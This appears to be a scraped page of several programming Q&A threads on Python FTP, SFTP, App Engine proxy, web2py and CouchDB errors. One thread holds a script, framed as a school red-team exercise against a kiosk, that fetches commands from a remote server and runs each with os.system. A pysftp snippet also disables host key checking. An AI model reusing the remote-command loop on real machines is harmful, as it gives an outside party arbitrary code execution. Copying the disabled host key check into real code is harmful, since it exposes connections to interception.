ftplib connecting error error_proto 150 in python - python

Im using this code to connect and to get list of directory from a ftp. It works but in some computer I receive ftplib.error_proto: 150. Whats the meaning of this error? Is this error due to anti-virus or permission issues? My os is windows xp.
-Edited
#http_pool = urllib3.connection_from_url(myurl)
#r1 = http_pool.get_url(myurl)
#print r1.data
Sorry I post the wrong code above. Im using ftplib
self.ftp = FTP(webhost)
self.ftp.login(username, password)
x = self.ftp.retrlines('LIST')
Error message:
File "ftplib.pyo", line 421, in retrlines
File "ftplib.pyo", line 360, in transfercmd
File "ftplib.pyo", line 329, in ntransfercmd
File "ftplib.pyo", line 243, in sendcmd
File "ftplib.pyo", line 219, in getresp
ftplib.error_proto: 150
thanks

Unfortunately urllib3 does not support the FTP protocol. We've given some thought of adding support for more protocols but it's not going to happen soon.
For FTP, have a look at things like ftplib or one of the many options on PyPI.

I was getting the same error. I tried following the same processes through console. For me this error was being thrown when there was a network connection issue. I wrote a a funtion with decorator retrying. To keep on retrying connecting with remort until successful:
Example:
#retry(wait_random_min=1000, wait_random_max=2000)
def connect_to_remort(self)
self.ftp = FTP(webhost)
self.ftp.login(username, password)
x = self.ftp.retrlines('LIST')
print(x)

Related

python read and run commands from a remote text file

I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.
For example, if the text file has the command: "ls". The computer will run the command and list directory.
Also, pls don't suggest using urllib2 or whatever. I want to stick with python3.x
As soon as i run it i get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url) ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
print("####")
os.system(line)
Edit:
yes i realize this is a bad idea. It is a school project, we are playing red team and we are supposed to get access to a kiosk. I figured instead of writing code that will try and get around intrusion detection and firewalls, it would just be easier to execute commands from a remote server. Thanks for the help everyone!
The error occurs because your url does not include a protocol. Include "http://" (or https if you're using ssl/tls) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
Try
“http://localhost/domain.com/test.txt"
Or remote address
If local host need to run http server

Python pysftp.put raises "No such file" exception although file is uploaded

I am using pysftp to connect to a server and upload a file to it.
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
self.sftp = pysftp.Connection(host=self.serverConnectionAuth['host'], port=self.serverConnectionAuth['port'],
username=self.serverConnectionAuth['username'], password=self.serverConnectionAuth['password'],
cnopts=cnopts)
self.sftp.put(localpath=self.filepath+filename, remotepath=filename)
Sometimes it does okay with no error, but sometime it puts the file correctly, BUT raises the following exception. The file is read and processed by another program running on the server, so I can see that the file is there and it is not corrupted
File "E:\Anaconda\envs\py35\lib\site-packages\pysftp\__init__.py", line 364, in put
confirm=confirm)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 727, in put
return self.putfo(fl, remotepath, file_size, callback, confirm)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 689, in putfo
s = self.stat(remotepath)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 460, in stat
t, msg = self._request(CMD_STAT, path)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 780, in _request
return self._read_response(num)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 832, in _read_response
self._convert_status(msg)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 861, in _convert_status
raise IOError(errno.ENOENT, text)
FileNotFoundError: [Errno 2] No such file
How can I prevent the exception?
From the described behaviour, I assume that the file is removed very shortly after it is uploaded by some server-side process.
By default pysftp.Connection.put verifies the upload by checking a size of the target file. If the server-side processes manages to remove the file too fast, reading the file size would fail.
You can disable the post-upload check by setting confirm parameter to False:
self.sftp.put(localpath=self.filepath+filename, remotepath=filename, confirm=False)
I believe the check is redundant anyway, see
How to perform checksums during a SFTP file transfer for data integrity?
For a similar question about Paramiko (which pysftp uses internally), see:
Paramiko put method throws "[Errno 2] File not found" if SFTP server has trigger to automatically move file upon upload
Also had this issue of the file automatically getting moved before paramiko could do an os.stat on the uploaded file and compare the local and uploaded file sizes.
#Martin_Prikryl solution works works fine for removing the error by passing in confirm=False when using sftp.put or sftp.putfo
If you want this check to still run to verify the file has been uploaded fully you can run something along these lines. For this to work you will need to know the moved file location and have the ability to read the file.
import os
sftp.putfo(source_file_object, destination_file, confirm=False)
upload_size = sftp.stat(moved_path).st_size
local_size = os.stat(source_file_object).st_size
if upload_size != local_size:
raise IOError(
"size mismatch in put! {} != {}".format(upload_size, local_size)
)
Both checks use os.stat

dev-server HTTP Error 403: Forbidden

After updating from 1.7.5 (where everything worked fine) I'm getting a HTTP Error 403: Forbidden when trying to open any sites via localhost. Strange thing is I have pretty much the same setup at home as here at work and everything works there... Might be an issue with proxy server we're using at work, since that's the only difference I can think of? Here's the error log I'm getting, so if anyone knows what's going on please help (;
Traceback (most recent call last):
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 1302, in communicate
req.respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 831, in respond
self.server.gateway(self).respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 2115, in respond
response = self.req.server.wsgi_app(self.env, self.start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\wsgi_server.py", line 246, in __call__
return app(environ, start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\request_rewriter.py", line 311, in _rewriter_middleware
response_body = iter(application(environ, wrapped_start_response))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 89, in __call__
self._flush_logs(response.get('logs', []))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 220, in _flush_logs
apiproxy_stub_map.MakeSyncCall('logservice', 'Flush', request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 94, in MakeSyncCall
return stubmap.MakeSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 320, in MakeSyncCall
rpc.CheckSuccess()
File "U:\Dev\GAE\google\appengine\api\apiproxy_rpc.py", line 156, in _WaitImpl
self.request, self.response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 200, in MakeSyncCall
self._MakeRealSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 226, in _MakeRealSyncCall
encoded_response = self._server.Send(self._path, encoded_request)
File "U:\Dev\GAE\google\appengine\tools\appengine_rpc.py", line 393, in Send
f = self.opener.open(req)
File "U:\Dev\Python\lib\urllib2.py", line 410, in open
response = meth(req, response)
File "U:\Dev\Python\lib\urllib2.py", line 523, in http_response
'http', request, response, code, msg, hdrs)
File "U:\Dev\Python\lib\urllib2.py", line 448, in error
return self._call_chain(*args)
File "U:\Dev\Python\lib\urllib2.py", line 382, in _call_chain
result = func(*args)
File "U:\Dev\Python\lib\urllib2.py", line 531, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 403: Forbidden
INFO 2013-04-19 12:28:52,576 server.py:561] default: "GET / HTTP/1.1" 500 -
INFO 2013-04-19 12:28:52,619 server.py:561] default: "GET /favicon.ico HTTP/1.1" 304 -
Also, the launcher throws an error when closing:
Traceback (most recent call last):
File "launcher\mainframe.pyc", line 327, in OnStop
File "launcher\taskcontroller.pyc", line 167, in Stop
File "launcher\dev_appserver_task_thread.pyc", line 82, in stop
File "launcher\taskthread.pyc", line 107, in stop
File "launcher\platform.pyc", line 397, in KillProcess
pywintypes.error: (5, 'TerminateProcess', 'Access is denied.')
I had this very same issue with my MacOSX when using a proxy server using Google App Engine Launcher 1.8.6. Apparently there's an issue with "proxy_bypass" on "urllib2.py".
There are two possible solutions:
Downgrade to 1.7.5, but, who wants to downgrade?
Edit "[GAE Instalattion path]/google/appengine/tools/appengine_rpc.py" and look for the line that says
opener.add_handler(fancy_urllib.FancyProxyHandler())
In my computer it was line 578, and then put a hash (#) at the beginning of the line, like this:
`#opener.add_handler(fancy_urllib.FancyProxyHandler())`
Save the file, stop and then restart your application. Now dev_appserver.py shouldn't try to use any proxy server at all.
If your application uses any external resources like a SOAP Webservice or something like that and you can't reach the server without the proxy server, then you'll have to downgrade. Please keep in mind that external javascript files (like facebook SDK or similar) are loaded from your browser, not from your application.
Since I'm not using any external REST or SOAP services it worked for me!
Hopefully it will work for you as well.
Try either:
-Accessing it through a different proxy. I.E a . proxy within a proxy
-Accessing it through your local IP i.e 192.168.1.1
I faced the same issue with version 1.9.5. Seems that the API proxy is sending some RPCs to the proxy server, which are then being rejected with HTTP 403 (since proxy servers are generally configured to reject connection attempts to arbitrary ports). In my case I was using the urlfetch module in my app to access external web pages, so disabling the proxy server was not a choice for me.
This is how I worked around the issue some time back (most probably it was based on comments found under this issue, but I cannot remember the exact sources).
NOTE:
For this approach to work, you'll have to know the hostname/IP address and default port of your proxy server, and change them appropriately in the code if you happen to connect to a different proxy server.
When you are not behind the proxy server, you will have to revert the applied changes in order to return to a working state (if you want internet access inside your app).
Here it goes:
Disable proxy settings for the Python (Google App Engine Launcher) environment in some way. (In my case it was easy since I was launching the dev_appserver.py from a Terminal shell (on Linux), and the unset http_proxy and unset https_proxy commands did the trick.)
Edit {App Engine SDK root}/google/appengine/api/urlfetch_stub.py. Find the code block
if _CONNECTION_SUPPORTS_TIMEOUT:
connection = connection_class(host, timeout=deadline)
else:
connection = connection_class(host)
(lines 376-379 in my case) and replace it with:
if _CONNECTION_SUPPORTS_TIMEOUT:
if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
connection = connection_class(host, timeout=deadline)
else:
connection = connection_class('your_proxy_host_goes_here', your_proxy_port_number_goes_here, timeout=deadline)
else:
if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
connection = connection_class(host)
else:
connection = connection_class('your_proxy_host_goes_here', your_proxy_port_number_goes_here)
replacing the placeholders your_proxy_host_goes_here and your_proxy_port_number_goes_here with appropriate values.
(I believe this code can be written more elegantly, though... any Python geeks out there? :) )
In my case, I also had to delete the existing compiled file urlfetch_stub.pyc (located in the same directory as urlfetch_stub.py) because the SDK didn't seem to pick up the changes until I did so.
Now you can use dev_appserver to launch your app, and use urlfetch-backed services within the app, free from HTTP 403 errors.

web2py error : Connection reset by peer

I've been googling for days trying to find a straight answer for why this is happening, but can't find anything useful. I have a web2py application that simply reads a database and makes some requests to a REST api. It is a healthcheck monitor so it refreshes itself every minute. There are about 20 or so users at any given time. Here is the error I'm seeing very consistently in the log file:
ERROR:Rocket.Errors.Port8080:Traceback (most recent call last):
File "/opt/apps/web2py/gluon/rocket.py", line 562, in listen
sock = self.wrap_socket(sock)
File "/opt/apps/web2py/gluon/rocket.py", line 506, in wrap_socket
ssl_version = ssl.PROTOCOL_SSLv23)
File "/usr/local/lib/python2.7/ssl.py", line 342, in wrap_socket
ciphers=ciphers)
File "/usr/local/lib/python2.7/ssl.py", line 121, in __init__
self.do_handshake()
File "/usr/local/lib/python2.7/ssl.py", line 281, in do_handshake
self._sslobj.do_handshake()
error: [Errno 104] Connection reset by peer
Based on some googling the most promising piece of information is that someone is trying to connect through a firewall and so it is killing the connection, however I don't understand why it's taking the actual application down. The process is still running, but no one can connect and I have to restart web2py.
I will be very appreciative of any input here. I'm beyond frustration.
Thanks!
The most common source of Connection reset by peer errors is that the remote client decides he doesn't want to contact you anymore, and cancels the interaction (with shutdown/an RST packet). This happens if the user navigates to a different page while the site is loading.
In your case, the remote host gave up on the connection even before you got to read or write anything on it. With the current web2py, this should only output the warning you're seeing, and not terminate anything.
If you have the current web2py, the error of not being able to connect is unrelated to these error messages. If you have an old version of web2py, you should update.

HttpLib2 throws error when trying to do a request to couchdb

I'm building an application in Python2.6 that needs to get data from CouchDb. I'm using CouchDB-0.8-py2.6 to connect to the database.
I'm using this code:
import couchdb
server = couchdb.Server(url='http://localhost:5984/', full_commit=True, session=None)
db = server['databaseName']
doc = db['docId']
value = doc['value']
print(value)
On my local machine (OSX) the code runs perfectly, but when I'm trying to run it on a Debian server, I get the following error:
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 165, in __getitem__
db.resource.head() # actually make a request to the database
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 977, in head
return self._request('HEAD', path, headers=headers, **params)
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 1010, in _request
resp, data = _make_request()
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 1005, in _make_request
body=body, headers=headers)
File "/usr/local/lib/python2.6/dist-packages/httplib2-0.6.0-py2.6.egg/httplib2/__init__.py", line 1025, in request
cached_value = self.cache.get(cachekey)
AttributeError: 'bool' object has no attribute 'get'
I've tried to Google this numerous times and no-one seems to have the same error. Does anyone have an idea what I'm doing wrong here?
You're using a different version of CouchDB on the server - CouchDB-0.7dev_r199. CouchDB does not use httplib2 anymore, so if you get your development and server environments roughly the same the problem is quite likely to disappear.

Categories

Resources